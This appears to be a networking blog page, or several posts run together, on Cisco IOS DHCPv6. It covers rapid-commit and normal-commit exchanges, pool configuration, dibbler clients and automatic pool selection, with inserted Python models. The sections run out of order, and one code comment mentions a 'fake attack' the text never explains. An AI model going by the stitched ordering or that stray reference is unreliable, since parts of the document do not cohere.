Address: 2001:DB8:23:0:8A1:BD85:5F98:2321/128

preferred lifetime INFINITY, valid lifetime INFINITY

DNS server: XXXX:YYYY:8B6B:90E0::57

DNS server: 2001:DB8::57

Domain name: nouri.com

Information refresh time: 0

Prefix Rapid-Commit: disabled

Address Rapid-Commit: enabled

R3#

The client uses a static route out of the DHCPv6 client interface; since it is a point-to-point segment, no next-hop address is needed.

R3#ping ipv6 2001:DB8:23::2

Type escape sequence to abort.

Sending 5, 100-byte ICMP Echos to 2001:DB8:23::2, timeout is 2 seconds:

!!!!!

Success rate is 100 percent (5/5), round-trip min/avg/max = 8/22/44 ms
R3#

Normal-commit (default)

Picture3: Stateful DHCPv6 normal-commit topology

R2 (server):

interface FastEthernet0/1
ipv6 address 2001:DB8:23::2/64
ipv6 dhcp server pool23

R3 (Client):

interface FastEthernet0/0
ipv6 address dhcp
ipv6 enable

To use normal commit, it is enough to omit the keyword "rapid-commit".

The ADVERTISE message offers an address to the client, which then sends a REQUEST. The REQUEST is still sent to the all DHCP agents multicast address FF02::1:2, but it carries the Server Identifier of the server the client selected, so the other servers discard it and only the selected server commits the address and answers with a REPLY.

R3 (client) debug ipv6 dhcp:

R3(config-if)#

*Oct 23 17:41:57.463: IPv6 DHCP: Sending SOLICIT to FF02::1:2 on FastEthernet0/0
*Oct 23 17:41:57.511: IPv6 DHCP: Received ADVERTISE from FE80::C803:37FF:FEAC:6 on FastEthernet0/0
*Oct 23 17:41:57.511: IPv6 DHCP: Adding server FE80::C803:37FF:FEAC:6
*Oct 23 17:41:58.611: IPv6 DHCP: Sending REQUEST to FF02::1:2 on FastEthernet0/0

*Oct 23 17:41:58.611: IPv6 DHCP: DHCPv6 address changes state from SOLICIT to REQUEST (ADDR_ADVERTISE_RECEIVED) on FastEthernet0/0

*Oct 23 17:41:58.655: IPv6 DHCP: Received REPLY from FE80::C803:37FF:FEAC:6on FastEthernet0/0

*Oct 23 17:41:58.655: IPv6 DHCP: Processing options

*Oct 23 17:41:58.655: IPv6 DHCP: Adding address 2001:DB8:23:0:9D54:7AB6:AC57:8230/128 to FastEthernet0/0

*Oct 23 17:41:58.663: IPv6 DHCP: T1 set to expire in 43200 seconds

*Oct 23 17:41:58.663: IPv6 DHCP: T2 set to expire in 69120 seconds

*Oct 23 17:41:58.663: IPv6 DHCP: Configuring DNS server XXXX:YYYY:8B6B:90E0::57

*Oct 23 17:41:58.667: IPv6 DHCP: Configuring DNS server 2001:DB8::57

*Oct 23 17:41:58.667: IPv6 DHCP: Configuring domain name nouri.com

*Oct 23 17:41:58.667: IPv6 DHCP: DHCPv6 address changes state from REQUEST to OPEN (ADDR_REPLY_RECEIVED) on FastEthernet0/0

R3(config-if)#

Picture4: Stateful DHCPv6 normal-commit message exchange
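To make the difference between the two exchanges concrete, in particular what happens with more than one server on the link, here is an added example, not code from the original posts, that models the two-message rapid-commit exchange described in the rapid-commit section above and the four-message exchange just shown. Messages are Python dictionaries rather than wire bytes; only the decision of which server commits a binding is modelled. The server and client DUIDs are the ones seen in the lab outputs, while the two pool prefixes, the server preference values and the transaction IDs are assumptions.

```python
# Model of the two DHCPv6 address-assignment exchanges of RFC 3315 with two
# servers on one link. Messages are dicts, not wire bytes: only the logic that
# decides which server commits a binding is modelled.
# Server/client DUIDs are the ones seen in the lab outputs; the pool prefixes
# and preference values are assumed for the demonstration.

SOLICIT, ADVERTISE, REQUEST, REPLY = 1, 2, 3, 7
ALL_DHCP_AGENTS = "ff02::1:2"          # every client message below is multicast here


class Server:
    def __init__(self, duid, pool_prefix, preference=0, rapid_commit=False):
        self.duid = duid
        self.pool_prefix = pool_prefix
        self.preference = preference
        self.rapid_commit = rapid_commit   # "ipv6 dhcp server <pool> rapid-commit"
        self.bindings = {}                 # client DUID -> committed address
        self.next_iid = 1

    def _commit(self, client_duid):
        """Create (or reuse) the binding for this client: the memory the fake attack exhausts."""
        if client_duid not in self.bindings:
            self.bindings[client_duid] = "%s%x" % (self.pool_prefix, self.next_iid)
            self.next_iid += 1
        return self.bindings[client_duid]

    def handle(self, msg):
        """Return the message this server sends in response, or None if it stays silent."""
        if msg["type"] == SOLICIT:
            if msg["rapid_commit"] and self.rapid_commit:
                # Two-message exchange: the binding is committed on the SOLICIT.
                return {"type": REPLY, "trid": msg["trid"], "server_duid": self.duid,
                        "address": self._commit(msg["client_duid"])}
            # Four-message exchange: offer, but commit nothing yet.
            return {"type": ADVERTISE, "trid": msg["trid"], "server_duid": self.duid,
                    "preference": self.preference}
        if msg["type"] == REQUEST:
            # REQUEST goes to ff02::1:2 but carries a Server Identifier; every
            # other server must discard it, so exactly one binding is created.
            if msg["server_duid"] != self.duid:
                return None
            return {"type": REPLY, "trid": msg["trid"], "server_duid": self.duid,
                    "address": self._commit(msg["client_duid"])}
        return None


class Client:
    def __init__(self, duid, rapid_commit=False):
        self.duid = duid
        self.rapid_commit = rapid_commit   # "ipv6 address dhcp rapid-commit"
        self.messages_on_link = 0

    def _send(self, msg, servers):
        """Multicast one message and collect the answers of all servers on the link."""
        self.messages_on_link += 1
        answers = [a for a in (s.handle(msg) for s in servers) if a is not None]
        self.messages_on_link += len(answers)
        return answers

    def run(self, servers):
        """Run one address-assignment exchange; return the address the client keeps."""
        solicit = {"type": SOLICIT, "trid": 0x3E7A1C, "dst": ALL_DHCP_AGENTS,
                   "client_duid": self.duid, "rapid_commit": self.rapid_commit}
        answers = self._send(solicit, servers)
        replies = [a for a in answers if a["type"] == REPLY]
        if replies:
            # Rapid Commit: the client keeps the first REPLY; every other server
            # that answered has committed an address nobody will ever use.
            return replies[0]["address"]
        advertises = [a for a in answers if a["type"] == ADVERTISE]
        chosen = max(advertises, key=lambda a: a["preference"])   # highest preference wins
        request = {"type": REQUEST, "trid": 0x3E7A1D, "dst": ALL_DHCP_AGENTS,
                   "client_duid": self.duid, "server_duid": chosen["server_duid"]}
        replies = self._send(request, servers)
        return replies[0]["address"]


def compare():
    """Same client and servers in both modes; report who committed what and how
    many messages crossed the link."""
    results = {}
    for mode in ("rapid", "normal"):
        rc = mode == "rapid"
        servers = [Server("00030001ca030cbc0008", "2001:db8:a::", preference=0, rapid_commit=rc),
                   Server("00030001ca0337ac0008", "2001:db8:b::", preference=255, rapid_commit=rc)]
        client = Client("00030001ca060c880008", rapid_commit=rc)
        address = client.run(servers)
        results[mode] = {"address": address,
                         "messages": client.messages_on_link,
                         "committed_by": sorted(s.duid for s in servers if s.bindings)}
    return results


if __name__ == "__main__":
    for mode, result in compare().items():
        print(mode, result)
```

With two servers, rapid commit costs three messages but leaves two committed bindings, one of which the client never uses; the four-message exchange costs five messages and exactly one binding, on the server the client selected.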

DHCPv6 address assignment


The immense address space provided by IPv6 brings some challenges in the management and distribution of these 128-bit addresses. SLAAC (Stateless Address Autoconfiguration) is a good solution for small networks or isolated segments, but it is not appropriate for large networks where address assignment requires more control and accountability. This is where DHCPv6, the stateful address autoconfiguration, comes in.

In this post I will try to share with you my experience with Cisco IOS implementation of DHCPv6 which became more mature with recent IOS versions.

Cisco IOS DHCPv6 prior to 12.4(24)T

As shown below, IOS releases earlier than 12.4(24)T do not seem to support the DHCPv6 IA (Identity Association) option, which clients use to request and manage their IPv6 addresses, temporary (IA_TA) or non-temporary (IA_NA).

Picture: Example of DHCPv6 server reaction to Request containing IA (IOS 12.4(15) T8):

Picture: Linux dibbler-client with default option IA:

Only stateless DHCPv6 works, after disabling the "ia" option in the dibbler-client configuration.

######## After disabling IA option on dibbler-client with Cisco IOS < 12.4(24)T

user@debian:/etc/init.d$ sudo dibbler-client run
| Dibbler – a portable DHCPv6, version 0.7.3 (CLIENT, Linux port)

| Authors : Tomasz Mrugalski<thomson(at)klub.com.pl>,Marek Senderski<msend(at)o2.pl>

| Licence : GNU GPL v2 only. Developed at Gdansk University of Technology.

| Homepage: http://klub.com.pl/dhcpv6/


2011.12.23 16:03:51 Client Info Creating INFORMATION-REQUEST message on eth1/3 interface.

2011.12.23 16:03:52 Client Info Received REPLY on eth1/3,TransID=0x799f59, 4 opts: 2 1 23 24

2011.12.23 16:03:52 Client Notice Setting up DNS server 2001:db8:3000:3000::42 on interface eth1/3.

2011.12.23 16:03:52 Client Notice Setting up Domain example.com on interface eth1/3.

——

Before starting DHCPv6 configuration, I would like to mention a couple of definitions of some DHCPv6 concepts according to different sources:

– Identity association for non-temporary addresses (IA_NA): An IA that carries assigned addresses that are not temporary addresses

– Identity association for temporary addresses (IA_TA): An IA that carries temporary addresses (see RFC 3041).

– Temporary addresses in DHCPv6 play the role of the privacy extensions for SLAAC (RFC 3041): their purpose is to provide a level of privacy and make tracking by eavesdroppers harder in hostile environments, but in an enterprise network they complicate troubleshooting, attack trace-back and monitoring.

http://www.ietf.org/rfc/rfc3315.txt

DHCPv6 protocol is a stateful counterpart to "IPv6 Stateless Address Autoconfiguration" (RFC 2462)
 The Rapid Commit option is used to signal the use of the two message exchange for address assignment. 

http://www.cisco.com/en/US/docs/ios/ipv6/configuration/guide/ip6-dhcp.html#wp1054059

Rapid Commit: The DHCPv6 client can obtain configuration parameters from a server either through a rapid two-message exchange (solicit, reply) or through a normal four-message exchange (solicit, advertise, request, reply). By default, the four-message exchange is used. When the rapid-commit option is enabled by both client and server, the two-message exchange is used.

The normal commit mode is useful when you have more than one DHCPv6 server: the client chooses among the ADVERTISE messages it receives, and only the server named in its REQUEST commits the address.

The Dibbler documentation defines "stateful" and "stateless" slightly differently, which could be confusing:

http://klub.com.pl/dhcpv6/doc/dibbler-user.pdf

stateful: it assumes that addresses (and possibly other parameters) are assigned to a client. To perform this kind of configuration, four messages are exchanged: SOLICIT, ADVERTISE, REQUEST and REPLY.
stateless: when only parameters are configured (without assigning addresses to a client). During execution of this type of configuration, only two messages are exchanged: INF-REQUEST and REPLY.

For more information about the DHCPv6 features supported by your IOS release and device, refer to "Feature Information for Implementing DHCP for IPv6" and the Cisco Feature Navigator.

Lab Configuration using IOS 12.4(24)T:

Starting with IOS 12.4(24)T, IA (Identity Association) is supported through the command "address prefix" under "ipv6 dhcp pool".

I used:

– IOS 12.4(24)T on GNS3 for DHCPv6 server and client modes.

– Three different devices as DHCPv6 clients: IOS router, Linux Debian and Windows Vista.

Picture: Lab topology

Cisco router DHCPv6 server

!
ipv6 unicast-routing

ipv6 cef

ipv6 dhcp pool pool1


address prefix 2001:DB8:1111::/64 lifetime infinite infinite

dns-server 2001:DB8:1201::1

domain-name domain1.com

!

ipv6 dhcp pool pool2


address prefix 2001:DB8:2222::/64 lifetime infinite infinite

dns-server 2001:DB8:1202::1

domain-name domain2.com

!

ipv6 dhcp pool pool3


address prefix 2001:DB8:3333::/64 lifetime infinite infinite

dns-server 2001:DB8:1203::1

domain-name domain3.com

Now you can put the interfaces in the server role, each serving clients from its corresponding pool. Don't forget "ipv6 nd managed-config-flag": it sets the M flag in the Router Advertisements and instructs the clients to obtain their address through stateful autoconfiguration (DHCPv6).

interface FastEthernet0/0
ipv6 address 2001:DB8:1111::1/64

ipv6 enable

ipv6 nd managed-config-flag

ipv6 dhcp server pool1

!

interface FastEthernet0/1

ipv6 address 2001:DB8:2222::1/64

ipv6 enable

ipv6 nd managed-config-flag

ipv6 dhcp server pool2

!

interface FastEthernet1/0

ipv6 address 2001:DB8:3333::1/64

ipv6 enable

ipv6 nd managed-config-flag

ipv6 dhcp server pool3

DHCPv6#sh ipv6 dhcp
This device’s DHCPv6 unique identifier(DUID): 00030001CA0490380008

DHCPv6#

DHCPv6#sh ipv6 dhcp pool

DHCPv6 pool: pool1

Address allocation prefix: 2001:DB8:1111::/64 valid 4294967295 preferred 4294967295 (1 in use, 0 conflicts)

DNS server: 2001:DB8:1201::1

Domain name: domain1.com


Active clients: 1

DHCPv6 pool: pool2

Address allocation prefix: 2001:DB8:2222::/64 valid 4294967295 preferred 4294967295 (1 in use, 0 conflicts)

DNS server: 2001:DB8:1202::1

Domain name: domain2.com


Active clients: 1

DHCPv6 pool: pool3

Address allocation prefix: 2001:DB8:3333::/64 valid 4294967295 preferred 4294967295 (1 in use, 0 conflicts)

DNS server: 2001:DB8:1203::1

Domain name: domain3.com


Active clients: 1

DHCPv6#

DHCPv6#sh ipv6 dhcp interface

FastEthernet0/0 is in server mode

Using pool: pool1

Preference value: 0

Hint from client: ignored

Rapid-Commit: disabled

FastEthernet0/1 is in server mode

Using pool: pool2

Preference value: 0

Hint from client: ignored

Rapid-Commit: disabled

FastEthernet1/0 is in server mode

Using pool: pool3

Preference value: 0

Hint from client: ignored

Rapid-Commit: disabled

DHCPv6#

Windows Vista dibbler-client (netsh output translated from French):

netsh interface ipv6>show address loopback0

Parameters for address 2001:db8:3333:0:2537:afc2:4365:1370
---------------------------------------------------------
Interface LUID     : loopback0
Scope ID           : 0.0
Valid lifetime     : infinite
Preferred lifetime : infinite
DAD state          : Preferred
Address type       : Dhcp

Parameters for address fe80::f825:40a1:16dd:e757%12
---------------------------------------------------------
Interface LUID     : loopback0
Scope ID           : 0.12
Valid lifetime     : infinite
Preferred lifetime : infinite
DAD state          : Preferred
Address type       : Other

netsh interface ipv6>

Debian dibbler-client:

user@debian:/etc/init.d$ sudo dibbler-client run
| Dibbler – a portable DHCPv6, version 0.7.3 (CLIENT, Linux port)

| Authors : Tomasz Mrugalski<thomson(at)klub.com.pl>,Marek Senderski<msend(at)o2.pl>

| Licence : GNU GPL v2 only. Developed at Gdansk University of Technology.

| Homepage: http://klub.com.pl/dhcpv6/


2011.12.23 17:08:48 Client Info Creating SOLICIT message with 1 IA(s), no TA and 0 PD(s) on eth1/3 interface.

2011.12.23 17:08:49 Client Info Received ADVERTISE on eth1/3,TransID=0xee14b2, 5 opts: 2 1 3 23 24

2011.12.23 17:08:50 Client Info Creating REQUEST. Backup server list contains 1 server(s).

2011.12.23 17:08:51 Client Info Received REPLY on eth1/3,TransID=0x201d85, 5 opts: 2 1 3 23 24

2011.12.23 17:08:51 Client Notice Address 2001:db8:2222:0:8d1b:4b3d:24e1:d21e/64 added to eth1/3 interface.

2011.12.23 17:08:51 Client Notice Setting up DNS server 2001:db8:1202::1 on interface eth1/3.

2011.12.23 17:08:51 Client Notice Setting up Domain domain2.com on interface eth1/3.

user@debian:~$ ping6 2001:db8:2222::1
PING 2001:db8:2222::1(2001:db8:2222::1) 56 data bytes

64 bytes from 2001:db8:2222::1: icmp_seq=1 ttl=64 time=49.4 ms

64 bytes from 2001:db8:2222::1: icmp_seq=2 ttl=64 time=19.2 ms

64 bytes from 2001:db8:2222::1: icmp_seq=3 ttl=64 time=24.9 ms

^C

— 2001:db8:2222::1 ping statistics —

3 packets transmitted, 3 received, 0% packet loss, time 5010ms

rtt min/avg/max/mdev = 10.164/23.191/49.493/12.532 ms

user@debian:~$

One last thing: let’s remove the pool binding from one interface and see whether the server can find the appropriate pool by itself, based on the network the client is connected to.

IOS DHCPv6 Server:

interface FastEthernet0/0
ipv6 address 2001:DB8:1111::1/64
ipv6 enable
ipv6 nd managed-config-flag
no ipv6 dhcp server pool1
ipv6 dhcp server automatic

Let’s verify the settings

DHCPv6#sh ipv6 dhcp interface

FastEthernet0/0 is in server mode

Using pool: pool1

Preference value: 0

Hint from client: ignored

Rapid-Commit: disabled

FastEthernet0/1 is in server mode


Using pool:

Preference value: 0

Hint from client: ignored

Rapid-Commit: disabled

FastEthernet1/0 is in server mode

Using pool: pool3

Preference value: 0

Hint from client: ignored

Rapid-Commit: disabled

DHCPv6#

No pool is explicitly bound to interface fa0/1 any more.

Re-run the dibbler client:

user@debian:/etc/init.d$ sudo dibbler-client run

DHCPv6(config-if)#…

*Dec 30 04:55:57.391: IPv6 DHCP: Received REQUEST from FE80::A00:27FF:FE83:6B58 on FastEthernet0/1

*Dec 30 04:55:57.399: IPv6 DHCP: Matched prefix 2001:DB8:2222:: at length = 64

*Dec 30 04:55:57.399: IPv6 DHCP: Using longest match 2001:DB8:2222::/64 pool pool2 for incoming interface

*Dec 30 04:55:57.411: IPv6 DHCP: Updating binding address entry for address 2001:DB8:2222:0:559:1016:D88A:D520

*Dec 30 04:55:57.411: IPv6 DHCP: Sending REPLY to FE80::A00:27FF:FE83:6B58 on FastEthernet0/1

DHCPv6(config-if)#

The DHCPv6 server selected the pool “pool2” as the longest match for the address of the interface that received the SOLICIT.

Debian dibbler-client:

user@debian:/etc/init.d$ sudo dibbler-client run
| Dibbler – a portable DHCPv6, version 0.7.3 (CLIENT, Linux port)

| Authors : Tomasz Mrugalski<thomson(at)klub.com.pl>,Marek Senderski<msend(at)o2.pl>

| Licence : GNU GPL v2 only. Developed at Gdansk University of Technology.

| Homepage: http://klub.com.pl/dhcpv6/

2011.12.30 03:55:53 Client Info Creating SOLICIT message with 1 IA(s), no TA and 0 PD(s) on eth1/3 interface.

2011.12.30 03:55:54 Client Info Received ADVERTISE on eth1/3,TransID=0x721ebd, 5 opts: 2 1 3 23 24

2011.12.30 03:55:55 Client Info Creating REQUEST. Backup server list contains 1 server(s).

2011.12.30 03:55:56 Client Info Received REPLY on eth1/3,TransID=0x4c8253, 5 opts: 2 1 3 23 24

2011.12.30 03:55:56 Client Notice Address 2001:db8:2222:0:559:1016:d88a:d520/64 added to eth1/3 interface.

2011.12.30 03:55:56 Client Notice Setting up DNS server 2001:db8:1202::1 on interface eth1/3.

2011.12.30 03:55:56 Client Notice Setting up Domain domain2.com on interface eth1/3.
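As an added example (not code from the original post), the following Python models what “ipv6 dhcp server automatic” does, a longest-prefix match of the receiving interface’s addresses against the configured pool prefixes, and runs that selection over the “debug ipv6 dhcp” lines above to confirm that each assigned address falls inside the pool chosen for that interface. The pool and interface tables come from the lab configuration; the third debug line is constructed to show a binding that the check flags.

```python
import ipaddress
import re

# Pools and interface addresses as configured in the lab above.
POOLS = {
    "pool1": ipaddress.IPv6Network("2001:DB8:1111::/64"),
    "pool2": ipaddress.IPv6Network("2001:DB8:2222::/64"),
    "pool3": ipaddress.IPv6Network("2001:DB8:3333::/64"),
}
INTERFACES = {
    "FastEthernet0/0": ["2001:DB8:1111::1/64"],
    "FastEthernet0/1": ["2001:DB8:2222::1/64"],
    "FastEthernet1/0": ["2001:DB8:3333::1/64"],
}

def select_pool(interface, pools=POOLS, interfaces=INTERFACES):
    """Mimic 'ipv6 dhcp server automatic': longest-prefix match of the receiving
    interface's addresses against the pools; None if no pool covers the interface."""
    best = None
    for addr in interfaces.get(interface, []):
        ip = ipaddress.IPv6Interface(addr).ip
        for name, net in pools.items():
            if ip in net and (best is None or net.prefixlen > best[1].prefixlen):
                best = (name, net)
    return best

# Patterns for the two 'debug ipv6 dhcp' lines shown in the post.
REQUEST_RE = re.compile(r"Received REQUEST from \S+ on (\S+)")
BINDING_RE = re.compile(r"Updating binding address entry for address (\S+)")

def check_bindings(debug_lines, pools=POOLS, interfaces=INTERFACES):
    """Report (interface, address, selected pool, in_pool) per binding debug line."""
    results, iface = [], None
    for line in debug_lines:
        if m := REQUEST_RE.search(line):
            iface = m.group(1)          # remember the interface of the last REQUEST
        elif iface and (m := BINDING_RE.search(line)):
            addr = ipaddress.IPv6Address(m.group(1))
            chosen = select_pool(iface, pools, interfaces)
            ok = chosen is not None and addr in chosen[1]
            results.append((iface, str(addr), chosen[0] if chosen else None, ok))
    return results

# Constructed sample: the two debug lines from the post, then a made-up binding
# on the same interface whose address lies outside pool2 (should be flagged).
SAMPLE_DEBUG = [
    "*Dec 30 04:55:57.391: IPv6 DHCP: Received REQUEST from FE80::A00:27FF:FE83:6B58 on FastEthernet0/1",
    "*Dec 30 04:55:57.411: IPv6 DHCP: Updating binding address entry for address 2001:DB8:2222:0:559:1016:D88A:D520",
    "*Dec 30 04:56:10.000: IPv6 DHCP: Updating binding address entry for address 2001:DB8:3333::99",
]
```

Running check_bindings(SAMPLE_DEBUG) returns one row per binding; the last row carries in_pool False because 2001:DB8:3333::99 does not belong to pool2, the pool matched for FastEthernet0/1.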


Automatic 6to4 mechanism


Here is a small animation explaining how automatic 6to4 works. For more details about the deployment please refer to this previous post.

